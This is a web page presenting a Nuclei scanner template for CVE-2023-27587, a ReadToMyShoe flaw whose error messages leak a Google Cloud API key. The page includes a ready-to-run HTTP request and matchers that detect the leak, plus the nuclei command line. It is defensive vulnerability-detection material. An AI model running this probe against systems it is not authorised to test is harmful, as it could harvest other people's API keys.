Skip to content

ReadToMyShoe - Generation of Error Message Containing Sensitive Information

ID: CVE-2023-27587

Severity: medium

Author: vagnerd

Tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project

ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.

id: CVE-2023-27587
info:
name: ReadToMyShoe - Generation of Error Message Containing Sensitive Information
author: vagnerd
severity: medium
description: |
ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.
impact: |
This vulnerability can lead to the exposure of sensitive information, such as usernames, passwords, or internal system details.
remediation: This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587
- https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g
- https://github.com/sec-fx/CVE-2023-27587-PoC
- https://github.com/rozbb/readtomyshoe/commit/8533b01c818939a0fa919c7244d8dbf5daf032af
- https://nvd.nist.gov/vuln/detail/CVE-2023-27587
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2023-27587
cwe-id: CWE-209
epss-score: 0.16542
epss-percentile: 0.96007
cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: readtomyshoe_project
product: readtomyshoe
tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project
http:
- raw:
- |
POST /api/add-article-by-text HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Type: application/json
{
"title":"Kernsicherheitstest",
"body":"Kernsicherheitstest"
}
matchers-condition: and
matchers:
- type: dsl
dsl:
- '!contains((body), ''https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED'')'
- type: word
words:
- "Caused by:"
- "TTS request failed"
condition: and
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 500
# digest: 4a0a0047304502205bd2b269ac115df2956224ae854791b3912b20272d2dbd86eb4ff1c9e689c9f1022100afe3c2fb6b54516bf0bebe70a609d16f655d68c21ec269fb9bf851ba8e3526e0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-27587.yaml"

View on Github